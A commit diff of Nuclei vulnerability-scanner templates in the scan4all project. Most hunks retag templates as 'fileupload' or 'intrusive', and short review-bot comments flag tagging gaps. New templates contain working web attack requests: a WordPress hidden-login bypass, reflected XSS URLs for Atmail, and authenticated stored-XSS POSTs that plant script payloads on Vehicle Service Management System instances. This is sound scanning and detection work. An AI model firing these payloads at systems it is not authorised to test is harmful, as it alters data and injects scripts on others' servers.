Projects STRLCPY scan4all Commits 342b5a91
  • ■ ■ ■ ■
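--- a/config/nuclei-templates/cnvd/2021/CNVD-2021-49104.yaml
+++ b/config/nuclei-templates/cnvd/2021/CNVD-2021-49104.yaml
@@ -13,7 +13,7 @@
  cvss-score: 9.9
  cwe-id: CWE-434
  remediation: Pan Wei has released an update to resolve this vulnerability.
- tags: pan,micro,cnvd,cnvd2021
+ tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
  
 requests:
  - raw: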
  • ■ ■ ■ ■
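--- a/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml
+++ b/config/nuclei-templates/cves/2016/CVE-2016-3088.yaml
@@ -15,7 +15,7 @@
  cvss-score: 9.8
  cve-id: CVE-2016-3088
  cwe-id: CWE-20
- tags: fileupload,kev,edb,cve,cve2016,apache,activemq
+ tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
  
 requests:
  - raw: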
  • ■ ■ ■ ■
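--- a/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml
+++ b/config/nuclei-templates/cves/2017/CVE-2017-12615.yaml
@@ -19,7 +19,7 @@
  cwe-id: CWE-434
  metadata:
  shodan-query: title:"Apache Tomcat"
- tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache
+ tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
  
 requests:
  - method: PUT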
  • ■ ■ ■ ■
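--- a/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml
+++ b/config/nuclei-templates/cves/2017/CVE-2017-15715.yaml
@@ -15,7 +15,7 @@
  cvss-score: 8.1
  cve-id: CVE-2017-15715
  cwe-id: CWE-20
- tags: apache,httpd,fileupload,vulhub,cve,cve2017
+ tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
  
 requests:
  - raw: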
  • ■ ■ ■ ■
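--- a/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml
+++ b/config/nuclei-templates/cves/2017/CVE-2017-6090.yaml
@@ -16,7 +16,7 @@
  cwe-id: CWE-434
  metadata:
  shodan-query: http.title:"PhpCollab"
- tags: cve2017,phpcollab,rce,fileupload,edb,cve
+ tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive
  
 requests:
  - raw: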
  • ■ ■ ■ ■
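--- a/config/nuclei-templates/cves/2018/CVE-2018-15961.yaml
+++ b/config/nuclei-templates/cves/2018/CVE-2018-15961.yaml
@@ -17,7 +17,7 @@
  cwe-id: CWE-434
  metadata:
  shodan-query: http.component:"Adobe ColdFusion"
- tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev
+ tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive
  
 requests:
  - raw: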
  • ■ ■ ■ ■
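--- a/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml
+++ b/config/nuclei-templates/cves/2018/CVE-2018-20526.yaml
@@ -19,7 +19,7 @@
  metadata:
  google-dork: intitle:"Roxy file manager"
  verified: "true"
- tags: cve,cve2018,roxy,fileman,rce,upload,intrusive,packetstorm,edb
+ tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
  
 requests:
  - raw: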
  • ■ ■ ■ ■
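--- a/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml
+++ b/config/nuclei-templates/cves/2019/CVE-2019-20183.yaml
@@ -15,7 +15,7 @@
  cvss-score: 7.2
  cve-id: CVE-2019-20183
  cwe-id: CWE-434
- tags: upload,edb,cve,cve2019,rce,intrusive
+ tags: edb,cve,cve2019,rce,intrusive,fileupload
  
 requests:
  - raw: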
  • ■ ■ ■ ■
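--- a/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-12800.yaml
@@ -16,7 +16,7 @@
  cvss-score: 9.8
  cve-id: CVE-2020-12800
  cwe-id: CWE-434
- tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020
+ tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive
  
 requests:
  - raw: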
  • ■ ■ ■ ■ ■
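--- a/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-17518.yaml
@@ -17,7 +17,8 @@
  cvss-score: 7.5
  cve-id: CVE-2020-17518
  cwe-id: CWE-22
- tags: lfi,flink,upload,vulhub,cve,cve2020,apache
+ tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive
+ 
  
 requests:
  - raw: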
  • ■ ■ ■ ■
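--- a/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-23972.yaml
@@ -17,7 +17,7 @@
  cvss-score: 7.5
  cve-id: CVE-2020-23972
  cwe-id: CWE-434
- tags: cve,cve2020,joomla,edb,packetstorm
+ tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive
  
 requests:
  - raw: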
  • ■ ■ ■ ■
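--- a/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-24186.yaml
@@ -15,7 +15,7 @@
  cvss-score: 10
  cve-id: CVE-2020-24186
  cwe-id: CWE-434
- tags: rce,upload,packetstorm,cve,cve2020,wordpress,wp-plugin
+ tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive
  
 requests:
  - raw: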
  • ■ ■ ■ ■
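--- a/config/nuclei-templates/cves/2020/CVE-2020-25213.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-25213.yaml
@@ -17,7 +17,7 @@
  cvss-score: 9.8
  cve-id: CVE-2020-25213
  cwe-id: CWE-434
- tags: cve,cve2020,wordpress,rce,kev
+ tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive
  
 requests:
  - raw: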
  • ■ ■ ■ ■
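--- a/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-28871.yaml
@@ -14,7 +14,7 @@
  cvss-score: 9.8
  cve-id: CVE-2020-28871
  cwe-id: CWE-434
- tags: cve2020,monitorr,rce,oast,unauth,edb,cve
+ tags: cve2020,monitorr,rce,oast,unauth,edb,cve,fileupload,intrusive
  
 requests:
  - raw: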
  • ■ ■ ■ ■
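--- a/config/nuclei-templates/cves/2020/CVE-2020-35489.yaml
+++ b/config/nuclei-templates/cves/2020/CVE-2020-35489.yaml
@@ -15,7 +15,7 @@
  cvss-score: 10
  cve-id: CVE-2020-35489
  cwe-id: CWE-434
- tags: cve,cve2020,wordpress,wp-plugin,rce,upload
+ tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
  
 requests:
  - method: GET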
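Review bot: The new tag list still carries `upload`, while every other template touched by this commit is moved to `fileupload`, so a run filtered on the `fileupload` tag would not select this template; `tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive` would bring it in line with the rest. The only request visible in this section is `- method: GET` and the remainder of the template lies outside it, so it is worth confirming that the request really changes state on the target before marking it `intrusive`. If it is a read-only check, the tag would exclude it from runs that skip intrusive templates and a vulnerable host would go unreported.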
  • ■ ■ ■ ■
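--- a/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml
+++ b/config/nuclei-templates/cves/2021/CVE-2021-21978.yaml
@@ -18,7 +18,7 @@
  cvss-score: 9.8
  cve-id: CVE-2021-21978
  cwe-id: CWE-434
- tags: cve,cve2021,vmware,rce,packetstorm
+ tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive
  
 requests:
  - raw: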
  • ■ ■ ■ ■
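--- a/config/nuclei-templates/cves/2021/CVE-2021-22005.yaml
+++ b/config/nuclei-templates/cves/2021/CVE-2021-22005.yaml
@@ -15,7 +15,7 @@
  cvss-score: 9.8
  cve-id: CVE-2021-22005
  cwe-id: CWE-434
- tags: cve,cve2021,vmware,vcenter,upload,kev
+ tags: cve,cve2021,vmware,vcenter,fileupload,kev,intrusive
  
 requests:
  - raw: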
  • ■ ■ ■ ■ ■
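--- a/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml
+++ b/config/nuclei-templates/cves/2021/CVE-2021-24236.yaml
@@ -16,7 +16,8 @@
  cvss-score: 9.8
  cve-id: CVE-2021-24236
  cwe-id: CWE-434
- tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,upload,wordpress,wp-plugin
+ tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive
+ 
  
 variables:
  php: "{{to_lower('{{randstr}}')}}.php"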
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-24917.yaml
     1 +id: CVE-2021-24917
     2 + 
     3 +info:
     4 + name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header
     5 + author: akincibor
     6 + severity: high
     7 + description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
     8 + reference:
     9 + - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
     10 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24917
     12 + remediation: Fixed in version 1.9.1
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     15 + cvss-score: 7.5
     16 + cve-id: CVE-2021-24917
     17 + cwe-id: CWE-863
     18 + metadata:
     19 + verified: "true"
     20 + tags: cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + GET /wp-admin/options.php HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Referer: something
     28 + 
     29 + matchers-condition: and
     30 + matchers:
     31 + - type: word
     32 + part: header
     33 + words:
     34 + - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'
     35 + 
     36 + - type: dsl
     37 + dsl:
     38 + - "!contains(tolower(location), 'wp-login.php')"
     39 + 
     40 + extractors:
     41 + - type: kval
     42 + kval:
     43 + - location
     44 + 
  • ■ ■ ■ ■
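--- a/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml
+++ b/config/nuclei-templates/cves/2021/CVE-2021-3378.yaml
@@ -16,7 +16,7 @@
  cvss-score: 9.8
  cve-id: CVE-2021-3378
  cwe-id: CWE-434
- tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021
+ tags: fortilogger,fortigate,fortinet,packetstorm,cve,cve2021,fileupload,intrusive
  
 requests:
  - raw: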
  • ■ ■ ■ ■
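--- a/config/nuclei-templates/cves/2021/CVE-2021-40870.yaml
+++ b/config/nuclei-templates/cves/2021/CVE-2021-40870.yaml
@@ -14,7 +14,7 @@
  cvss-score: 9.8
  cve-id: CVE-2021-40870
  cwe-id: CWE-434
- tags: cve,cve2021,rce,aviatrix,kev
+ tags: cve,cve2021,rce,aviatrix,kev,fileupload,intrusive
  
 requests:
  - raw: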
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-43574.yaml
     1 +id: CVE-2021-43574
     2 + 
     3 +info:
     4 + name: Atmail Hosting Webserver 6.5.0 - Cross-site scripting
     5 + author: arafatansari,ritikchaddha
     6 + severity: medium
     7 + description: |
     8 + Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “format” parameter
     9 + reference:
     10 + - https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2021-43574
     12 + - https://help.atmail.com/hc/en-us/sections/115003283988
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
     16 + cve-id: CVE-2021-43574
     17 + cwe-id: CWE-79
     18 + metadata:
     19 + shodan-query: http.html:"Powered by Atmail"
     20 + verified: "true"
     21 + tags: cve,cve2021,atmail,xss
     22 + 
     23 +requests:
     24 + - method: GET
     25 + path:
     26 + - "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     27 + - "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     28 + - "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
     29 + 
     30 + stop-at-first-match: true
     31 + matchers-condition: and
     32 + matchers:
     33 + - type: word
     34 + part: body
     35 + words:
     36 + - '<script>alert(document.domain)</script>" does not exist'
     37 + 
     38 + - type: word
     39 + part: header
     40 + words:
     41 + - text/html
     42 + 
     43 + - type: status
     44 + status:
     45 + - 500
     46 + - 403
     47 + condition: or
     48 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-46068.yaml
     1 +id: CVE-2021-46068
     2 +
     3 +info:
     4 + name: Vehicle Service Management System - Stored Cross Site Scripting
     5 + author: TenBird
     6 + severity: medium
     7 + description: |
     8 + A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
     9 + reference:
     10 + - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS
     11 + - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss
     12 + - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46068
     14 + classification:
     15 + cve-id: CVE-2021-46068
     16 + metadata:
     17 + verified: true
     18 + tags: cve,cve2021,xss,vms,authenticated
     19 +
     20 +requests:
     21 + - raw:
     22 + - |
     23 + POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
     24 + Host: {{Hostname}}
     25 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     26 +
     27 + username={{username}}&password={{password}}
     28 +
     29 + - |
     30 + POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
     31 + Host: {{Hostname}}
     32 + Content-Type: application/x-www-form-urlencoded
     33 +
     34 + id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
     35 +
     36 + - |
     37 + GET /vehicle_service/admin/?page=user HTTP/1.1
     38 + Host: {{Hostname}}
     39 +
     40 + req-condition: true
     41 + redirects: true
     42 + max-redirects: 2
     43 + cookie-reuse: true
     44 + matchers-condition: and
     45 + matchers:
     46 + - type: dsl
     47 + dsl:
     48 + - "contains(all_headers_3, 'text/html')"
     49 + - "status_code_3 == 200"
     50 + - 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")'
     51 + condition: and
     52 + 
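Review bot: The tag list `tags: cve,cve2021,xss,vms,authenticated` has no `intrusive` entry, although the second request posts to `Users.php?f=save` with `id=1` and a script payload in `firstname`, and nothing in the template restores the original value, so a scan leaves a persistent profile change and a stored script on the target. This commit adds `intrusive` to other state-changing templates (CVE-2022-0963, for example); the same applies here and to CVE-2021-46069, CVE-2021-46071 and CVE-2021-46072, which store the payload through `Master.php?f=save_*`, so the line should read `tags: cve,cve2021,xss,vms,authenticated,intrusive`. `verified: true` is unquoted here, unlike `verified: "true"` in CVE-2021-46069. The `classification` block also lacks the `cvss-metrics`, `cvss-score` and `cwe-id` fields that CVE-2021-46069 carries.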
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-46069.yaml
     1 +id: CVE-2021-46069
     2 +
     3 +info:
     4 + name: Vehicle Service Management System - Stored Cross Site Scripting
     5 + author: TenBird
     6 + severity: medium
     7 + description: |
     8 + A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
     9 + reference:
     10 + - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
     11 + - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
     12 + - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
     16 + cvss-score: 4.8
     17 + cve-id: CVE-2021-46069
     18 + cwe-id: CWE-79
     19 + metadata:
     20 + verified: "true"
     21 + tags: cve,cve2021,xss,vms,authenticated
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     28 +
     29 + username={{username}}&password={{password}}
     30 +
     31 + - |
     32 + POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
     33 + Host: {{Hostname}}
     34 + Content-Type: application/x-www-form-urlencoded
     35 +
     36 + id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&[email protected]&status=1
     37 +
     38 + - |
     39 + GET /vehicle_service/admin/?page=mechanics HTTP/1.1
     40 + Host: {{Hostname}}
     41 +
     42 + req-condition: true
     43 + redirects: true
     44 + max-redirects: 2
     45 + cookie-reuse: true
     46 + matchers-condition: and
     47 + matchers:
     48 + - type: dsl
     49 + dsl:
     50 + - "contains(all_headers_3, 'text/html')"
     51 + - "status_code_3 == 200"
     52 + - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
     53 + condition: and
     54 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-46071.yaml
     1 +id: CVE-2021-46071
     2 +
     3 +info:
     4 + name: Vehicle Service Management System - Stored Cross Site Scripting
     5 + author: TenBird
     6 + severity: medium
     7 + description: |
     8 + A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
     9 + reference:
     10 + - https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS
     11 + - https://www.plsanu.com/vehicle-service-management-system-category-list-stored-cross-site-scripting-xss
     12 + - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46071
     14 + classification:
     15 + cve-id: CVE-2021-46071
     16 + metadata:
     17 + verified: true
     18 + tags: cve,cve2021,xss,vms,authenticated
     19 +
     20 +requests:
     21 + - raw:
     22 + - |
     23 + POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
     24 + Host: {{Hostname}}
     25 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     26 +
     27 + username={{username}}&password={{password}}
     28 +
     29 + - |
     30 + POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
     31 + Host: {{Hostname}}
     32 + Content-Type: application/x-www-form-urlencoded
     33 +
     34 + id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
     35 +
     36 + - |
     37 + GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
     38 + Host: {{Hostname}}
     39 +
     40 + req-condition: true
     41 + redirects: true
     42 + max-redirects: 2
     43 + cookie-reuse: true
     44 + matchers-condition: and
     45 + matchers:
     46 + - type: dsl
     47 + dsl:
     48 + - "contains(all_headers_3, 'text/html')"
     49 + - "status_code_3 == 200"
     50 + - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
     51 + condition: and
     52 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-46072.yaml
     1 +id: CVE-2021-46072
     2 +
     3 +info:
     4 + name: Vehicle Service Management System - Stored Cross Site Scripting
     5 + author: TenBird
     6 + severity: medium
     7 + description: |
     8 + A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
     9 + reference:
     10 + - https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS
     11 + - https://www.plsanu.com/vehicle-service-management-system-service-list-stored-cross-site-scripting-xss
     12 + - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2021-46072
     14 + classification:
     15 + cve-id: CVE-2021-46072
     16 + metadata:
     17 + verified: true
     18 + tags: cve,cve2021,xss,vms,authenticated
     19 +
     20 +requests:
     21 + - raw:
     22 + - |
     23 + POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
     24 + Host: {{Hostname}}
     25 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     26 +
     27 + username={{username}}&password={{password}}
     28 +
     29 + - |
     30 + POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1
     31 + Host: {{Hostname}}
     32 + Content-Type: application/x-www-form-urlencoded
     33 +
     34 + id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
     35 +
     36 + - |
     37 + GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1
     38 + Host: {{Hostname}}
     39 +
     40 + req-condition: true
     41 + redirects: true
     42 + max-redirects: 2
     43 + cookie-reuse: true
     44 + matchers-condition: and
     45 + matchers:
     46 + - type: dsl
     47 + dsl:
     48 + - "contains(all_headers_3, 'text/html')"
     49 + - "status_code_3 == 200"
     50 + - 'contains(body_3, "<td>\"><script>alert(document.domain)</script></td>")'
     51 + condition: and
     52 + 
  • ■ ■ ■ ■
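--- a/config/nuclei-templates/cves/2022/CVE-2022-0595.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-0595.yaml
@@ -13,7 +13,7 @@
  cvss-score: 5.4
  cve-id: CVE-2022-0595
  cwe-id: CWE-79
- tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan
+ tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive
  
 requests:
  - raw: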
  • ■ ■ ■ ■
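--- a/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-0963.yaml
@@ -18,7 +18,7 @@
  cwe-id: CWE-79
  metadata:
  verified: "true"
- tags: xss,microweber,cms,authenticated,huntr,cve,cve2022
+ tags: xss,microweber,cms,authenticated,huntr,cve,cve2022,intrusive
  
 requests:
  - raw: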
  • ■ ■ ■ ■
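--- a/config/nuclei-templates/cves/2022/CVE-2022-26352.yaml
+++ b/config/nuclei-templates/cves/2022/CVE-2022-26352.yaml
@@ -15,7 +15,7 @@
  cvss-score: 9.8
  cve-id: CVE-2022-26352
  cwe-id: CWE-22,CWE-434
- tags: packetstorm,cve,cve2022,rce,dotcms,kev
+ tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive
  
 requests:
  - raw: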
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/mfiles-web-detect.yaml
     1 +id: mfiles-web-detect
     2 + 
     3 +info:
     4 + name: M-Files Web Panel Detect
     5 + author: Nodauf
     6 + severity: info
     7 + reference:
     8 + - https://www.m-files.com/about/trust-center/security-advisories/
     9 + metadata:
     10 + verified: true
     11 + shodan-query: http.html:"M-Files Web"
     12 + tags: panel,m-files
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}"
     18 + - "{{BaseURL}}/Login.aspx"
     19 + 
     20 + stop-at-first-match: true
     21 + matchers-condition: or
     22 + matchers:
     23 + - type: regex
     24 + part: body
     25 + regex:
     26 + - '<title>(.*)M-Files Web(.*)</title>'
     27 + 
     28 + - type: word
     29 + part: body
     30 + words:
     31 + - 'M-Files user'
     32 + - 'M-Files authentication'
     33 + condition: or
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/osticket/osticket-install.yaml
     1 +id: osticket-install
     2 + 
     3 +info:
     4 + name: OSTicket Installation
     5 + author: ritikchaddha
     6 + severity: high
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.title:"osTicket Installer"
     10 + tags: panel,osticket,install
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}/upload/setup/install.php"
     16 + - "{{BaseURL}}/setup/install.php"
     17 + 
     18 + stop-at-first-match: true
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - '<title>osTicket Installer'
     25 + 
     26 + - type: word
     27 + part: body
     28 + words:
     29 + - 'already installed'
     30 + negative: true
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/osticket-panel.yaml
     1 +id: osticket-panel
     2 + 
     3 +info:
     4 + name: OSTicket Panel Detect
     5 + author: ritikchaddha
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.html:"powered by osTicket"
     10 + tags: panel,osticket
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - "{{BaseURL}}"
     16 + - "{{BaseURL}}/login.php"
     17 + 
     18 + stop-at-first-match: true
     19 + redirects: true
     20 + max-redirects: 2
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + part: body
     25 + words:
     26 + - 'powered by osTicket'
     27 + - 'content="osTicket'
     28 + condition: or
     29 + 
     30 + - type: status
     31 + status:
     32 + - 200
     33 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aem/aem-debugging-libraries.yaml
     1 +id: aem-debugging-libraries
     2 + 
     3 +info:
     4 + name: Adobe AEM Debugging Client Libraries
     5 + author: dhiyaneshDk
     6 + severity: info
     7 + reference:
     8 + - https://aem4beginner.blogspot.com/debugging-client-libraries
     9 + - https://adobe-consulting-services.github.io/acs-aem-tools/features/dumplibs/index.html
     10 + metadata:
     11 + verified: true
     12 + shodan-query:
     13 + - http.title:"AEM Sign In"
     14 + - http.component:"Adobe Experience Manager"
     15 + tags: misconfig,aem,adobe
     16 + 
     17 +requests:
     18 + - method: GET
     19 + path:
     20 + - "{{BaseURL}}/libs/cq/ui/content/dumplibs.html"
     21 + - "{{BaseURL}}/libs/granite/ui/content/dumplibs.validate.html"
     22 + - "{{BaseURL}}/libs/granite/ui/content/dumplibs.rebuild.html"
     23 + - "{{BaseURL}}/libs/granite/ui/content/dumplibs.test.html"
     24 + - "{{BaseURL}}/libs/granite/ui/content/dumplibs.html"
     25 + 
     26 + stop-at-first-match: true
     27 + matchers:
     28 + - type: word
     29 + part: body
     30 + words:
     31 + - '<title>Client Libraries</title>'
     32 + - '<title>Rebuild Client Libraries</title>'
     33 + - '<title>Client Libraries Test Output</title>'
     34 + condition: or
     35 + 
  • ■ ■ ■ ■
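--- a/config/nuclei-templates/misconfiguration/cx-cloud-upload-detect.yaml
+++ b/config/nuclei-templates/misconfiguration/cx-cloud-upload-detect.yaml
@@ -4,7 +4,7 @@
  name: CX Cloud Unauthenticated Upload Detect
  author: dhiyaneshDk
  severity: info
- tags: upload
+ tags: fileupload
  
 requests:
  - method: GET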
  • ■ ■ ■ ■
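--- a/config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml
+++ b/config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml
@@ -11,7 +11,7 @@
  metadata:
  verified: "true"
  google-dork: intitle:"Roxy file manager"
- tags: intrusive,misconfig,edb,roxy,fileman,rce,upload
+ tags: intrusive,misconfig,edb,roxy,fileman,rce,fileupload
  
 requests:
  - raw: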
  • ■ ■ ■ ■
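--- a/config/nuclei-templates/misconfiguration/unauthenticated-popup-upload.yaml
+++ b/config/nuclei-templates/misconfiguration/unauthenticated-popup-upload.yaml
@@ -6,7 +6,7 @@
  severity: info
  reference:
  - https://www.exploit-db.com/ghdb/6671
- tags: edb,fileupload,upload
+ tags: edb,fileupload
  
 requests:
  - method: GET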
  • ■ ■ ■ ■
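--- a/config/nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/cisco-rv-series-rce.yaml
@@ -20,7 +20,7 @@
  metadata:
  shodan-query: http.html:"Cisco rv340"
  verified: "true"
- tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce
+ tags: auth-bypass,injection,packetstorm,cve,cve2021,cisco,rce,intrusive
  
 requests:
  - raw: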
  • ■ ■ ■ ■
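--- a/config/nuclei-templates/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
@@ -11,7 +11,7 @@
  cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  cvss-score: 10.0
  cwe-id: CWE-77
- tags: rce
+ tags: rce,fileupload,intrusive
  
 requests:
  - raw: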
  • ■ ■ ■ ■
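--- a/config/nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml
@@ -10,7 +10,7 @@
  - https://nvd.nist.gov/vuln/detail/CVE-2021-45420
  metadata:
  google-dork: inurl:"xweb500.cgi"
- tags: lfw,iot,dixell,xweb500,edb
+ tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive
  
 requests:
  - raw: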
  • ■ ■ ■ ■
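--- a/config/nuclei-templates/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/config/nuclei-templates/vulnerabilities/other/powercreator-cms-rce.yaml
@@ -12,7 +12,7 @@
  cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  cvss-score: 10.0
  cwe-id: CWE-77
- tags: rce,powercreator,intrusive
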